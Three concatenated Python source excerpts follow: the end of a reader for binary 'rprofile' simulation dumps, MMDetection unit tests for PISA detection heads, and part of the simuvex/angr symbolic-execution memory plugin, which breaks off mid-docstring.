'p', 'ux', 'uy', 'uz', 'ekr', 'ekt', 'ek', 'ekur', 'eiur', 'hur',
'ceul', 'mach', 'enuc', 'fnuc', 'dy',]
self._variable_names = list(self._variable_map.keys()) + self._legacy_order + ['fv_hi', 'y_hi']
self._variable_names.sort()
def _init_v11(self):
cell_ct_high = self.header_attrs.get('cell_ct_high')
cell_ct_low = self.header_attrs.get('cell_ct_low')
buckets_total = 1 + self.bucket_count
sizeof_float = self.header_attrs.get('sizeof_float')
float_type = np.float64 if sizeof_float == 8 else np.float32
int_type = np.int32
vals = 3 if self.version > 12 else 5
# name, size_in_bytes, <array dimensions>
self._variable_list = [('centers', float_type, sizeof_float, (vals, self.bucket_count)),
('normals', float_type, sizeof_float, (3, 3, self.bucket_count)),
('corners', float_type, sizeof_float, (3, 3, self.bucket_count)),
('j_hi', int_type, 4, (cell_ct_high,)),
('y_hi', float_type, sizeof_float, (cell_ct_high,)),
('fv_hi', float_type, sizeof_float, (4, cell_ct_high, buckets_total)),
('j', int_type, 4, (cell_ct_low,)),
('y', float_type, sizeof_float, (cell_ct_low,)),
('counts', float_type, sizeof_float, (4, cell_ct_low, buckets_total)),
('fv', float_type, sizeof_float, (4, cell_ct_low, buckets_total)),
('rho', float_type, sizeof_float, (4, cell_ct_low, buckets_total)),
('rhobubble', float_type, sizeof_float, (4, cell_ct_low, buckets_total)),
('rhospike', float_type, sizeof_float, (4, cell_ct_low, buckets_total)),
('rhourbubble', float_type, sizeof_float, (4, cell_ct_low, buckets_total)),
('rhourspike', float_type, sizeof_float, (4, cell_ct_low, buckets_total)),
('p', float_type, sizeof_float, (4, cell_ct_low, buckets_total)),
('ux', float_type, sizeof_float, (4, cell_ct_low, buckets_total)),
('uy', float_type, sizeof_float, (4, cell_ct_low, buckets_total)),
('uz', float_type, sizeof_float, (4, cell_ct_low, buckets_total)),
('ceul', float_type, sizeof_float, (4, cell_ct_low, buckets_total)),
('mach', float_type, sizeof_float, (4, cell_ct_low, buckets_total)),
('enuc', float_type, sizeof_float, (4, cell_ct_low, buckets_total)),
('fnuc', float_type, sizeof_float, (4, cell_ct_low, buckets_total)),
('dy', float_type, sizeof_float, (4, cell_ct_low, buckets_total)),
('ekr', float_type, sizeof_float, (4, cell_ct_low, buckets_total)),
('ekt', float_type, sizeof_float, (4, cell_ct_low, buckets_total)),
('ek', float_type, sizeof_float, (4, cell_ct_low, buckets_total)),
('ekur', float_type, sizeof_float, (4, cell_ct_low, buckets_total)),
('eiur', float_type, sizeof_float, (4, cell_ct_low, buckets_total)),
('hur', float_type, sizeof_float, (4, cell_ct_low, buckets_total)),
]
# present_vars = [v['name'] for v in self.header_var_list if self.version >= v.get('min_ver', self.version)]
# TODO: HACK UGH
skip_vars = []
if self.version > 12:
skip_vars.append('corners')
offset = self._header_size
for name, dtype, sizeof, shape in self._variable_list:
if name in skip_vars:
continue
# print (name, offset, dtype, sizeof, shape)
count = np.prod(shape)
size = sizeof * count
self._variable_map[name] = (offset, dtype, count, shape)
offset += size
# print (name, offset, dtype, count, shape, sizeof)
self._variable_names = list(self._variable_map.keys())
self._variable_names.sort()
def main():
'''Simple demo main function'''
if len(sys.argv) < 2:
print("Specify filename")
return
path = sys.argv[1]
if os.path.isdir(path):
rp_set = rprofile_set(sys.argv[1])
print(rp_set.ray_profiles)
else:
rp = rprofile(sys.argv[1], logging=True)
log.info('File version %i (real%i), with %i buckets and %i radial bins for dump %i' %
(rp.version, rp.get('sizeof_float'), rp.get('nbuckets'), rp.get('cell_ct_low'), rp.get('dump')))
header_keys = list(rp.header_attrs.keys())
header_keys.sort()
for k in header_keys:
print("%s: %s" % (k, rp.header_attrs[k]))
d = rp.get('fv')
print(d)
# print rp.get('j_hi', bucket=0)
print(rp.get_table('y'))
return
print("ceul")
print(rp.get('ceul'))
print("mach")
print(rp.get('mach'))
print("enuc")
print(rp.get('enuc'))
print("fnuc")
print(rp.get('fnucmx'))
print("dy")
print(rp.get('dy'))
if __name__ == "__main__":
main()
|
|
# Copyright (c) OpenMMLab. All rights reserved.
import mmcv
import torch
from mmdet.models.dense_heads import PISARetinaHead, PISASSDHead
from mmdet.models.roi_heads import PISARoIHead
def test_pisa_retinanet_head_loss():
"""Tests pisa retinanet head loss when truth is empty and non-empty."""
s = 256
img_metas = [{
'img_shape': (s, s, 3),
'scale_factor': 1,
'pad_shape': (s, s, 3)
}]
cfg = mmcv.Config(
dict(
assigner=dict(
type='MaxIoUAssigner',
pos_iou_thr=0.7,
neg_iou_thr=0.3,
min_pos_iou=0.3,
match_low_quality=True,
ignore_iof_thr=-1),
sampler=dict(
type='RandomSampler',
num=256,
pos_fraction=0.5,
neg_pos_ub=-1,
add_gt_as_proposals=False),
isr=dict(k=2., bias=0.),
carl=dict(k=1., bias=0.2),
allowed_border=0,
pos_weight=-1,
debug=False))
self = PISARetinaHead(num_classes=4, in_channels=1, train_cfg=cfg)
# Anchor head expects a multiple levels of features per image
feat = [
torch.rand(1, 1, s // (2**(i + 2)), s // (2**(i + 2)))
for i in range(len(self.anchor_generator.strides))
]
cls_scores, bbox_preds = self.forward(feat)
# Test that empty ground truth encourages the network to predict background
gt_bboxes = [torch.empty((0, 4))]
gt_labels = [torch.LongTensor([])]
gt_bboxes_ignore = None
empty_gt_losses = self.loss(cls_scores, bbox_preds, gt_bboxes, gt_labels,
img_metas, gt_bboxes_ignore)
# When there is no truth, the cls loss should be nonzero but there should
# be no box loss.
empty_cls_loss = empty_gt_losses['loss_cls'].sum()
empty_box_loss = empty_gt_losses['loss_bbox'].sum()
assert empty_cls_loss.item() > 0, 'cls loss should be non-zero'
assert empty_box_loss.item() == 0, (
'there should be no box loss when there are no true boxes')
# When truth is non-empty then both cls and box loss should be nonzero for
# random inputs
gt_bboxes = [
torch.Tensor([[23.6667, 23.8757, 238.6326, 151.8874]]),
]
gt_labels = [torch.LongTensor([2])]
one_gt_losses = self.loss(cls_scores, bbox_preds, gt_bboxes, gt_labels,
img_metas, gt_bboxes_ignore)
onegt_cls_loss = one_gt_losses['loss_cls'].sum()
onegt_box_loss = one_gt_losses['loss_bbox'].sum()
assert onegt_cls_loss.item() > 0, 'cls loss should be non-zero'
assert onegt_box_loss.item() > 0, 'box loss should be non-zero'
def test_pisa_ssd_head_loss():
"""Tests pisa ssd head loss when truth is empty and non-empty."""
s = 256
img_metas = [{
'img_shape': (s, s, 3),
'scale_factor': 1,
'pad_shape': (s, s, 3)
}]
cfg = mmcv.Config(
dict(
assigner=dict(
type='MaxIoUAssigner',
pos_iou_thr=0.5,
neg_iou_thr=0.5,
min_pos_iou=0.,
ignore_iof_thr=-1,
gt_max_assign_all=False),
isr=dict(k=2., bias=0.),
carl=dict(k=1., bias=0.2),
smoothl1_beta=1.,
allowed_border=-1,
pos_weight=-1,
neg_pos_ratio=3,
debug=False))
ssd_anchor_generator = dict(
type='SSDAnchorGenerator',
scale_major=False,
input_size=300,
strides=[1],
ratios=([2], ),
basesize_ratio_range=(0.15, 0.9))
self = PISASSDHead(
num_classes=4,
in_channels=(1, ),
train_cfg=cfg,
anchor_generator=ssd_anchor_generator)
# Anchor head expects a multiple levels of features per image
feat = [
torch.rand(1, 1, s // (2**(i + 2)), s // (2**(i + 2)))
for i in range(len(self.anchor_generator.strides))
]
cls_scores, bbox_preds = self.forward(feat)
# Test that empty ground truth encourages the network to predict background
gt_bboxes = [torch.empty((0, 4))]
gt_labels = [torch.LongTensor([])]
gt_bboxes_ignore = None
empty_gt_losses = self.loss(cls_scores, bbox_preds, gt_bboxes, gt_labels,
img_metas, gt_bboxes_ignore)
# When there is no truth, the cls loss should be nonzero but there should
# be no box loss.
empty_cls_loss = sum(empty_gt_losses['loss_cls'])
empty_box_loss = sum(empty_gt_losses['loss_bbox'])
# SSD is special, #pos:#neg = 1: 3, so empth gt will also lead loss cls = 0
assert empty_cls_loss.item() == 0, 'cls loss should be non-zero'
assert empty_box_loss.item() == 0, (
'there should be no box loss when there are no true boxes')
# When truth is non-empty then both cls and box loss should be nonzero for
# random inputs
gt_bboxes = [
torch.Tensor([[23.6667, 23.8757, 238.6326, 151.8874]]),
]
gt_labels = [torch.LongTensor([2])]
one_gt_losses = self.loss(cls_scores, bbox_preds, gt_bboxes, gt_labels,
img_metas, gt_bboxes_ignore)
onegt_cls_loss = sum(one_gt_losses['loss_cls'])
onegt_box_loss = sum(one_gt_losses['loss_bbox'])
assert onegt_cls_loss.item() > 0, 'cls loss should be non-zero'
assert onegt_box_loss.item() > 0, 'box loss should be non-zero'
def test_pisa_roi_head_loss():
"""Tests pisa roi head loss when truth is empty and non-empty."""
train_cfg = mmcv.Config(
dict(
assigner=dict(
type='MaxIoUAssigner',
pos_iou_thr=0.7,
neg_iou_thr=0.3,
min_pos_iou=0.3,
match_low_quality=True,
ignore_iof_thr=-1),
sampler=dict(
type='ScoreHLRSampler',
num=4,
pos_fraction=0.25,
neg_pos_ub=-1,
add_gt_as_proposals=True,
k=0.5,
bias=0.),
isr=dict(k=2., bias=0.),
carl=dict(k=1., bias=0.2),
allowed_border=0,
pos_weight=-1,
debug=False))
bbox_roi_extractor = dict(
type='SingleRoIExtractor',
roi_layer=dict(type='RoIAlign', output_size=7, sampling_ratio=0),
out_channels=1,
featmap_strides=[1])
bbox_head = dict(
type='Shared2FCBBoxHead',
in_channels=1,
fc_out_channels=2,
roi_feat_size=7,
num_classes=4,
bbox_coder=dict(
type='DeltaXYWHBBoxCoder',
target_means=[0., 0., 0., 0.],
target_stds=[0.1, 0.1, 0.2, 0.2]),
reg_class_agnostic=False,
loss_cls=dict(
type='CrossEntropyLoss', use_sigmoid=False, loss_weight=1.0),
loss_bbox=dict(type='L1Loss', loss_weight=1.0))
self = PISARoIHead(bbox_roi_extractor, bbox_head, train_cfg=train_cfg)
s = 256
img_metas = [{
'img_shape': (s, s, 3),
'scale_factor': 1,
'pad_shape': (s, s, 3)
}]
# Anchor head expects a multiple levels of features per image
feat = [
torch.rand(1, 1, s // (2**(i + 2)), s // (2**(i + 2)))
for i in range(1)
]
proposal_list = [
torch.Tensor([[22.6667, 22.8757, 238.6326, 151.8874], [0, 3, 5, 7]])
]
# Test that empty ground truth encourages the network to predict background
gt_bboxes = [torch.empty((0, 4))]
gt_labels = [torch.LongTensor([])]
gt_bboxes_ignore = None
empty_gt_losses = self.forward_train(feat, img_metas, proposal_list,
gt_bboxes, gt_labels,
gt_bboxes_ignore)
# When there is no truth, the cls loss should be nonzero but there should
# be no box loss.
empty_cls_loss = empty_gt_losses['loss_cls'].sum()
empty_box_loss = empty_gt_losses['loss_bbox'].sum()
assert empty_cls_loss.item() > 0, 'cls loss should be non-zero'
assert empty_box_loss.item() == 0, (
'there should be no box loss when there are no true boxes')
# When truth is non-empty then both cls and box loss should be nonzero for
# random inputs
gt_bboxes = [
torch.Tensor([[23.6667, 23.8757, 238.6326, 151.8874]]),
]
gt_labels = [torch.LongTensor([2])]
one_gt_losses = self.forward_train(feat, img_metas, proposal_list,
gt_bboxes, gt_labels, gt_bboxes_ignore)
onegt_cls_loss = one_gt_losses['loss_cls'].sum()
onegt_box_loss = one_gt_losses['loss_bbox'].sum()
assert onegt_cls_loss.item() > 0, 'cls loss should be non-zero'
assert onegt_box_loss.item() > 0, 'box loss should be non-zero'
|
|
#!/usr/bin/env python
import logging
l = logging.getLogger("simuvex.storage.memory")
import claripy
from ..plugins.plugin import SimStatePlugin
stn_map = { 'st%d' % n: n for n in xrange(8) }
tag_map = { 'tag%d' % n: n for n in xrange(8) }
class AddressWrapper(object):
"""
AddressWrapper is used in SimAbstractMemory, which provides extra meta information for an address (or a ValueSet
object) that is normalized from an integer/BVV/StridedInterval.
"""
def __init__(self, region, region_base_addr, address, is_on_stack, function_address):
"""
Constructor for the class AddressWrapper.
:param strregion: Name of the memory regions it belongs to.
:param int region_base_addr: Base address of the memory region
:param address: An address (not a ValueSet object).
:param bool is_on_stack: Whether this address is on a stack region or not.
:param int function_address: Related function address (if any).
"""
self.region = region
self.region_base_addr = region_base_addr
self.address = address
self.is_on_stack = is_on_stack
self.function_address = function_address
def __hash__(self):
return hash((self.region, self.address))
def __eq__(self, other):
return self.region == other.region and self.address == other.address
def __repr__(self):
return "<%s> %s" % (self.region, hex(self.address))
def to_valueset(self, state):
"""
Convert to a ValueSet instance
:param state: A state
:return: The converted ValueSet instance
"""
return state.se.VS(state.arch.bits, self.region, self.region_base_addr, self.address)
class RegionDescriptor(object):
"""
Descriptor for a memory region ID.
"""
def __init__(self, region_id, base_address, related_function_address=None):
self.region_id = region_id
self.base_address = base_address
self.related_function_address = related_function_address
def __repr__(self):
return "<%s - %#x>" % (
self.region_id,
self.related_function_address if self.related_function_address is not None else 0
)
class RegionMap(object):
"""
Mostly used in SimAbstractMemory, RegionMap stores a series of mappings between concrete memory address ranges and
memory regions, like stack frames and heap regions.
"""
def __init__(self, is_stack):
"""
Constructor
:param is_stack: Whether this is a region map for stack frames or not. Different strategies apply for stack
regions.
"""
self.is_stack = is_stack
# An AVLTree, which maps stack addresses to region IDs
self._address_to_region_id = AVLTree()
# A dict, which maps region IDs to memory address ranges
self._region_id_to_address = { }
#
# Properties
#
def __repr__(self):
return "RegionMap<%s>" % (
"S" if self.is_stack else "H"
)
@property
def is_empty(self):
return len(self._address_to_region_id) == 0
@property
def stack_base(self):
if not self.is_stack:
raise SimRegionMapError('Calling "stack_base" on a non-stack region map.')
return self._address_to_region_id.max_key()
@property
def region_ids(self):
return self._region_id_to_address.keys()
#
# Public methods
#
def copy(self):
r = RegionMap(is_stack=self.is_stack)
# A shallow copy should be enough, since we never modify any RegionDescriptor object in-place
if len(self._address_to_region_id) > 0:
# TODO: There is a bug in bintrees 2.0.2 that prevents us from copying a non-empty AVLTree object
# TODO: Consider submit a pull request
r._address_to_region_id = self._address_to_region_id.copy()
r._region_id_to_address = self._region_id_to_address.copy()
return r
def map(self, absolute_address, region_id, related_function_address=None):
"""
Add a mapping between an absolute address and a region ID. If this is a stack region map, all stack regions
beyond (lower than) this newly added regions will be discarded.
:param absolute_address: An absolute memory address.
:param region_id: ID of the memory region.
:param related_function_address: A related function address, mostly used for stack regions.
"""
if self.is_stack:
# Sanity check
if not region_id.startswith('stack_'):
raise SimRegionMapError('Received a non-stack memory ID "%d" in a stack region map' % region_id)
# Remove all stack regions that are lower than the one to add
while True:
try:
addr = self._address_to_region_id.floor_key(absolute_address)
descriptor = self._address_to_region_id[addr]
# Remove this mapping
del self._address_to_region_id[addr]
# Remove this region ID from the other mapping
del self._region_id_to_address[descriptor.region_id]
except KeyError:
break
else:
if absolute_address in self._address_to_region_id:
descriptor = self._address_to_region_id[absolute_address]
# Remove this mapping
del self._address_to_region_id[absolute_address]
del self._region_id_to_address[descriptor.region_id]
# Add this new region mapping
desc = RegionDescriptor(
region_id,
absolute_address,
related_function_address=related_function_address
)
self._address_to_region_id[absolute_address] = desc
self._region_id_to_address[region_id] = desc
def unmap_by_address(self, absolute_address):
"""
Removes a mapping based on its absolute address.
:param absolute_address: An absolute address
"""
desc = self._address_to_region_id[absolute_address]
del self._address_to_region_id[absolute_address]
del self._region_id_to_address[desc.region_id]
def absolutize(self, region_id, relative_address):
"""
Convert a relative address in some memory region to an absolute address.
:param region_id: The memory region ID
:param relative_address: The relative memory offset in that memory region
:return: An absolute address if converted, or an exception is raised when region id does not
exist.
"""
if region_id == 'global':
# The global region always bases 0
return relative_address
if region_id not in self._region_id_to_address:
raise SimRegionMapError('Non-existent region ID "%s"' % region_id)
base_address = self._region_id_to_address[region_id].base_address
return base_address + relative_address
def relativize(self, absolute_address, target_region_id=None):
"""
Convert an absolute address to the memory offset in a memory region.
Note that if an address belongs to heap region is passed in to a stack region map, it will be converted to an
offset included in the closest stack frame, and vice versa for passing a stack address to a heap region.
Therefore you should only pass in address that belongs to the same category (stack or non-stack) of this region
map.
:param absolute_address: An absolute memory address
:return: A tuple of the closest region ID, the relative offset, and the related function
address.
"""
if target_region_id is None:
if self.is_stack:
# Get the base address of the stack frame it belongs to
base_address = self._address_to_region_id.ceiling_key(absolute_address)
else:
try:
base_address = self._address_to_region_id.floor_key(absolute_address)
except KeyError:
# Not found. It belongs to the global region then.
return 'global', absolute_address, None
descriptor = self._address_to_region_id[base_address]
else:
if target_region_id == 'global':
# Just return the absolute address
return 'global', absolute_address, None
if target_region_id not in self._region_id_to_address:
raise SimRegionMapError('Trying to relativize to a non-existent region "%s"' % target_region_id)
descriptor = self._region_id_to_address[target_region_id]
base_address = descriptor.base_address
return descriptor.region_id, absolute_address - base_address, descriptor.related_function_address
class MemoryStoreRequest(object):
"""
A MemoryStoreRequest is used internally by SimMemory to track memory request data.
"""
def __init__(self, addr, data=None, size=None, condition=None, endness=None):
self.addr = addr
self.data = data
self.size = size
self.condition = condition
self.endness = endness
# was this store done?
self.completed = False
# stuff that's determined during handling
self.actual_addresses = None
self.constraints = [ ]
self.fallback_values = None
self.symbolic_sized_values = None
self.conditional_values = None
self.simplified_values = None
self.stored_values = None
def _adjust_condition(self, state):
self.condition = state._adjust_condition(self.condition)
class SimMemory(SimStatePlugin):
"""
Represents the memory space of the process.
"""
def __init__(self, endness=None, abstract_backer=None):
SimStatePlugin.__init__(self)
self.id = None
self.endness = "Iend_BE" if endness is None else endness
# Whether this memory is internally used inside SimAbstractMemory
self._abstract_backer = abstract_backer
#
# These are some performance-critical thresholds
#
# The maximum range of a normal write operation. If an address range is greater than this number,
# SimMemory will simply concretize it to a single value. Note that this is only relevant when
# the "symbolic" concretization strategy is enabled for writes.
self._write_address_range = 128
self._write_address_range_approx = 128
# The maximum range of a symbolic read address. If an address range is greater than this number,
# SimMemory will simply concretize it.
self._read_address_range = 1024
self._read_address_range_approx = 1024
# The maximum size of a symbolic-sized operation. If a size maximum is greater than this number,
# SimMemory will constrain it to this number. If the size minimum is greater than this
# number, a SimMemoryLimitError is thrown.
self._maximum_symbolic_size = 8 * 1024
self._maximum_symbolic_size_approx = 4*1024
# Same, but for concrete writes
self._maximum_concrete_size = 0x1000000
@property
def category(self):
"""
Return the category of this SimMemory instance. It can be one of the three following categories: reg, mem,
or file.
"""
if self.id in ('reg', 'mem'):
return self.id
elif self._abstract_backer:
return 'mem'
elif self.id.startswith('file'):
return 'file'
else:
raise SimMemoryError('Unknown SimMemory category for memory_id "%s"' % self.id)
def _resolve_location_name(self, name):
if self.category == 'reg':
if self.state.arch.name in ('X86', 'AMD64'):
if name in stn_map:
return (((stn_map[name] + self.load('ftop')) & 7) << 3) + self.state.arch.registers['fpu_regs'][0], 8
elif name in tag_map:
return ((tag_map[name] + self.load('ftop')) & 7) + self.state.arch.registers['fpu_tags'][0], 1
return self.state.arch.registers[name]
elif name[0] == '*':
return self.state.registers.load(name[1:]), None
else:
raise SimMemoryError("Trying to address memory with a register name.")
def _convert_to_ast(self, data_e, size_e=None):
"""
Make an AST out of concrete @data_e
"""
if type(data_e) is str:
# Convert the string into a BVV, *regardless of endness*
bits = len(data_e) * 8
data_e = self.state.se.BVV(data_e, bits)
elif type(data_e) in (int, long):
data_e = self.state.se.BVV(data_e, size_e*8 if size_e is not None
else self.state.arch.bits)
else:
data_e = data_e.to_bv()
return data_e
def store(self, addr, data, size=None, condition=None, add_constraints=None, endness=None, action=None, inspect=True, priv=None):
"""
Stores content into memory.
:param addr: A claripy expression representing the address to store at.
:param data: The data to store (claripy expression or something convertable to a claripy expression).
:param size: A claripy expression representing the size of the data to store.
The following parameters are optional.
:param condition: A claripy expression representing a condition if the store is conditional.
:param add_constraints: Add constraints resulting from the merge (default: True).
:param endness: The endianness for the data.
:param action: A SimActionData to fill out with the final written value and constraints.
"""
if priv is not None: self.state.scratch.push_priv(priv)
addr_e = _raw_ast(addr)
data_e = _raw_ast(data)
size_e = _raw_ast(size)
condition_e = _raw_ast(condition)
add_constraints = True if add_constraints is None else add_constraints
if isinstance(addr, str):
named_addr, named_size = self._resolve_location_name(addr)
addr = named_addr
addr_e = addr
if size is None:
size = named_size
size_e = size
# store everything as a BV
data_e = self._convert_to_ast(data_e, size_e if isinstance(size_e, (int, long)) else None)
if type(size_e) in (int, long):
size_e = self.state.se.BVV(size_e, self.state.arch.bits)
if inspect is True:
if self.category == 'reg':
self.state._inspect(
'reg_write',
BP_BEFORE,
reg_write_offset=addr_e,
reg_write_length=size_e,
reg_write_expr=data_e)
addr_e = self.state._inspect_getattr('reg_write_offset', addr_e)
size_e = self.state._inspect_getattr('reg_write_length', size_e)
data_e = self.state._inspect_getattr('reg_write_expr', data_e)
elif self.category == 'mem':
self.state._inspect(
'mem_write',
BP_BEFORE,
mem_write_address=addr_e,
mem_write_length=size_e,
mem_write_expr=data_e,
)
addr_e = self.state._inspect_getattr('mem_write_address', addr_e)
size_e = self.state._inspect_getattr('mem_write_length', size_e)
data_e = self.state._inspect_getattr('mem_write_expr', data_e)
# if the condition is false, bail
if condition_e is not None and self.state.se.is_false(condition_e):
if priv is not None: self.state.scratch.pop_priv()
return
if (
o.UNDER_CONSTRAINED_SYMEXEC in self.state.options and
isinstance(addr_e, claripy.ast.Base) and
addr_e.uninitialized
):
self._constrain_underconstrained_index(addr_e)
request = MemoryStoreRequest(addr_e, data=data_e, size=size_e, condition=condition_e, endness=endness)
self._store(request)
if inspect is True:
if self.category == 'reg': self.state._inspect('reg_write', BP_AFTER)
if self.category == 'mem': self.state._inspect('mem_write', BP_AFTER)
add_constraints = self.state._inspect_getattr('address_concretization_add_constraints', add_constraints)
if add_constraints and len(request.constraints) > 0:
self.state.add_constraints(*request.constraints)
if request.completed and o.AUTO_REFS in self.state.options and action is None and not self._abstract_backer:
ref_size = size if size is not None else (data_e.size() / 8)
region_type = self.category
if region_type == 'file':
# Special handling for files to keep compatibility
# We may use some refactoring later
region_type = self.id
action = SimActionData(self.state, region_type, 'write', addr=addr, data=data, size=ref_size, condition=condition)
self.state.log.add_action(action)
if request.completed and action is not None:
action.actual_addrs = request.actual_addresses
action.actual_value = action._make_object(request.stored_values[0]) # TODO
if len(request.constraints) > 0:
action.added_constraints = action._make_object(self.state.se.And(*request.constraints))
else:
action.added_constraints = action._make_object(self.state.se.true)
if priv is not None: self.state.scratch.pop_priv()
def _store(self, request):
raise NotImplementedError()
def store_cases(self, addr, contents, conditions, fallback=None, add_constraints=None, endness=None, action=None):
"""
Stores content into memory, conditional by case.
:param addr: A claripy expression representing the address to store at.
:param contents: A list of bitvectors, not necessarily of the same size. Use None to denote an empty
write.
:param conditions: A list of conditions. Must be equal in length to contents.
The following parameters are optional.
:param fallback: A claripy expression representing what the write should resolve to if all conditions
evaluate to false (default: whatever was there before).
:param add_constraints: Add constraints resulting from the merge (default: True)
:param endness: The endianness for contents as well as fallback.
:param action: A SimActionData to fill out with the final written value and constraints.
:type action: simuvex.s_action.SimActionData
"""
if fallback is None and all(c is None for c in contents):
l.debug("Avoiding an empty write.")
return
addr_e = _raw_ast(addr)
contents_e = _raw_ast(contents)
conditions_e = _raw_ast(conditions)
fallback_e = _raw_ast(fallback)
max_bits = max(c.length for c in contents_e if isinstance(c, claripy.ast.Bits)) if fallback is None else fallback.length
# if fallback is not provided by user, load it from memory
# remember to specify the endianness!
fallback_e = self.load(addr, max_bits/8, add_constraints=add_constraints, endness=endness) if fallback_e is None else fallback_e
req = self._store_cases(addr_e, contents_e, conditions_e, fallback_e, endness=endness)
add_constraints = self.state._inspect_getattr('address_concretization_add_constraints', add_constraints)
if add_constraints:
self.state.add_constraints(*req.constraints)
if req.completed and o.AUTO_REFS in self.state.options and action is None:
region_type = self.category
if region_type == 'file':
# Special handling for files to keep compatibility
# We may use some refactoring later
region_type = self.id
action = SimActionData(self.state, region_type, 'write', addr=addr, data=req.stored_values[-1], size=max_bits/8, condition=self.state.se.Or(*conditions), fallback=fallback)
self.state.log.add_action(action)
if req.completed and action is not None:
action.actual_addrs = req.actual_addresses
action.actual_value = action._make_object(req.stored_values[-1])
action.added_constraints = action._make_object(self.state.se.And(*req.constraints) if len(req.constraints) > 0 else self.state.se.true)
def _store_cases(self, addr, contents, conditions, fallback, endness=None):
extended_contents = [ ]
for c in contents:
if c is None:
c = fallback
else:
need_bits = fallback.length - c.length
if need_bits > 0:
c = c.concat(fallback[need_bits-1:0])
extended_contents.append(c)
case_constraints = { }
for c,g in zip(extended_contents, conditions):
if c not in case_constraints:
case_constraints[c] = [ ]
case_constraints[c].append(g)
unique_contents = [ ]
unique_constraints = [ ]
for c,g in case_constraints.items():
unique_contents.append(c)
unique_constraints.append(self.state.se.Or(*g))
if len(unique_contents) == 1 and unique_contents[0] is fallback:
req = MemoryStoreRequest(addr, data=fallback, endness=endness)
return self._store(req)
else:
simplified_contents = [ ]
simplified_constraints = [ ]
for c,g in zip(unique_contents, unique_constraints):
simplified_contents.append(self.state.se.simplify(c))
simplified_constraints.append(self.state.se.simplify(g))
cases = zip(simplified_constraints, simplified_contents)
#cases = zip(unique_constraints, unique_contents)
ite = self.state.se.simplify(self.state.se.ite_cases(cases, fallback))
req = MemoryStoreRequest(addr, data=ite, endness=endness)
return self._store(req)
def load(self, addr, size=None, condition=None, fallback=None, add_constraints=None, action=None, endness=None, inspect=True):
"""
Loads size bytes from dst.
:param dst: The address to load from.
:param size: The size (in bytes) of the load.
:param condition: A claripy expression representing a condition for a conditional load.
:param fallback: A fallback value if the condition ends up being False.
:param add_constraints: Add constraints resulting from the merge (default: True).
:param action: A SimActionData to fill out with the constraints.
:param endness: The endness to load with.
There are a few possible return values. If no condition or fallback are passed in,
then the return is the bytes at the address, in the form of a claripy expression.
For example:
<A BVV(0x41, 32)>
On the other hand, if a condition and fallback are provided, the value is conditional:
<A If(condition, BVV(0x41, 32), fallback)>
"""
add_constraints = True if add_constraints is None else add_constraints
addr_e = _raw_ast(addr)
size_e = _raw_ast(size)
condition_e = _raw_ast(condition)
fallback_e = _raw_ast(fallback)
if isinstance(addr, str):
named_addr, named_size = self._resolve_location_name(addr)
addr = named_addr
addr_e = addr
if size is None:
size = named_size
size_e = size
if size is None:
size = self.state.arch.bits / 8
size_e = size
if inspect is True:
if self.category == 'reg':
self.state._inspect('reg_read', BP_BEFORE, reg_read_offset=addr_e, reg_read_length=size_e)
addr_e = self.state._inspect_getattr("reg_read_offset", addr_e)
size_e = self.state._inspect_getattr("reg_read_length", size_e)
elif self.category == 'mem':
self.state._inspect('mem_read', BP_BEFORE, mem_read_address=addr_e, mem_read_length=size_e)
addr_e = self.state._inspect_getattr("mem_read_address", addr_e)
size_e = self.state._inspect_getattr("mem_read_length", size_e)
if (
o.UNDER_CONSTRAINED_SYMEXEC in self.state.options and
isinstance(addr_e, claripy.ast.Base) and
addr_e.uninitialized
):
self._constrain_underconstrained_index(addr_e)
a,r,c = self._load(addr_e, size_e, condition=condition_e, fallback=fallback_e)
add_constraints = self.state._inspect_getattr('address_concretization_add_constraints', add_constraints)
if add_constraints and c:
self.state.add_constraints(*c)
if (self.category == 'mem' and o.SIMPLIFY_MEMORY_READS in self.state.options) or \
(self.category == 'reg' and o.SIMPLIFY_REGISTER_READS in self.state.options):
l.debug("simplifying %s read...", self.category)
r = self.state.simplify(r)
if not self._abstract_backer and \
o.UNINITIALIZED_ACCESS_AWARENESS in self.state.options and \
self.state.uninitialized_access_handler is not None and \
(r.op == 'Reverse' or r.op == 'I') and \
hasattr(r._model_vsa, 'uninitialized') and \
r._model_vsa.uninitialized:
normalized_addresses = self.normalize_address(addr)
if len(normalized_addresses) > 0 and type(normalized_addresses[0]) is AddressWrapper:
normalized_addresses = [ (aw.region, aw.address) for aw in normalized_addresses ]
self.state.uninitialized_access_handler(self.category, normalized_addresses, size, r, self.state.scratch.bbl_addr, self.state.scratch.stmt_idx)
# the endianess
endness = self.endness if endness is None else endness
if endness == "Iend_LE":
r = r.reversed
if inspect is True:
if self.category == 'mem':
self.state._inspect('mem_read', BP_AFTER, mem_read_expr=r)
r = self.state._inspect_getattr("mem_read_expr", r)
elif self.category == 'reg':
self.state._inspect('reg_read', BP_AFTER, reg_read_expr=r)
r = self.state._inspect_getattr("reg_read_expr", r)
if o.AST_DEPS in self.state.options and self.category == 'reg':
r = SimActionObject(r, reg_deps=frozenset((addr,)))
if o.AUTO_REFS in self.state.options and action is None:
ref_size = size if size is not None else (r.size() / 8)
region_type = self.category
if region_type == 'file':
# Special handling for files to keep compatibility
# We may use some refactoring later
region_type = self.id
action = SimActionData(self.state, region_type, 'read', addr=addr, data=r, size=ref_size, condition=condition, fallback=fallback)
self.state.log.add_action(action)
if action is not None:
action.actual_addrs = a
action.added_constraints = action._make_object(self.state.se.And(*c) if len(c) > 0 else self.state.se.true)
return r
def _constrain_underconstrained_index(self, addr_e):
if not self.state.uc_manager.is_bounded(addr_e) or self.state.se.max_int(addr_e) - self.state.se.min_int( addr_e) >= self._read_address_range:
# in under-constrained symbolic execution, we'll assign a new memory region for this address
mem_region = self.state.uc_manager.assign(addr_e)
# ... but only if it's not already been constrained to something!
if self.state.se.solution(addr_e, mem_region):
self.state.add_constraints(addr_e == mem_region)
l.debug('Under-constrained symbolic execution: assigned a new memory region @ %s to %s', mem_region, addr_e)
def normalize_address(self, addr, is_write=False): #pylint:disable=no-self-use,unused-argument
"""
Normalize `addr` for use in static analysis (with the abstract memory model). In non-abstract mode, simply
returns the address in a single-element list.
"""
return [ addr ]
def _load(self, addr, size, condition=None, fallback=None):
raise NotImplementedError()
def find(self, addr, what, max_search=None, max_symbolic_bytes=None, default=None, step=1):
"""
Returns the address of bytes equal to 'what', starting from 'start'. Note that, if you don't specify a default
value, this search could cause the state to go unsat if no possible matching byte exists.
:param start: The start address.
:param what: What to search for;
:param max_search: Search at most this many bytes.
:param max_symbolic_bytes: Search through at most this many symbolic bytes.
:param default: The default value, if what you're looking for wasn't found.
